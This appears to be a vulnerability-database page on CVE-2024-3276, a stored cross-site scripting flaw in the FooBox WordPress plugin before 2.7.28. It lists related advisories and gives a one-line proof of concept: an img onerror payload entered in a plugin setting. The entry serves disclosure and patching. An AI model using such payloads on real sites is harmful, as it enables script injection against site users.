FooBox XSS vulnerability - Update by June 11, 2024
Reporter | Title | Published | Views | Family All 8 |
---|---|---|---|---|
Cvelist | CVE-2024-3276 FooBox (Free and Premium) < 2.7.28 - Admin+ Stored XSS | 18 Jun 202406:00 | – | cvelist |
Patchstack | WordPress FooBox Image Lightbox Plugin < 2.7.28 is vulnerable to Cross Site Scripting (XSS) | 28 May 202400:00 | – | patchstack |
Patchstack | WordPress Foobox Image Lightbox Premium Plugin < 2.7.28 is vulnerable to Cross Site Scripting (XSS) | 28 May 202400:00 | – | patchstack |
Vulnrichment | CVE-2024-3276 FooBox (Free and Premium) < 2.7.28 - Admin+ Stored XSS | 18 Jun 202406:00 | – | vulnrichment |
WPVulnDB | FooBox (Free and Premium) < 2.7.28 - Admin+ Stored XSS | 28 May 202400:00 | – | wpvulndb |
NVD | CVE-2024-3276 | 18 Jun 202406:15 | – | nvd |
CVE | CVE-2024-3276 | 18 Jun 202406:15 | – | cve |
Wordfence Blog | Wordfence Intelligence Weekly WordPress Vulnerability Report (May 27, 2024 to June 2, 2024) | 6 Jun 202415:09 | – | wordfence |
Source | Link |
---|---|
research | www.research.cleantalk.org/cve-2024-3276/ |
Go to settings and change the "Specific CSS classes" field to 123"</script><img src=x onerror=alert(1)>alert(1) (Admins and editors are allowed to use JS in posts/pages/comments/etc, so the unfiltered_html capability should be disallowed when testing for Stored XSS using such roles)
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo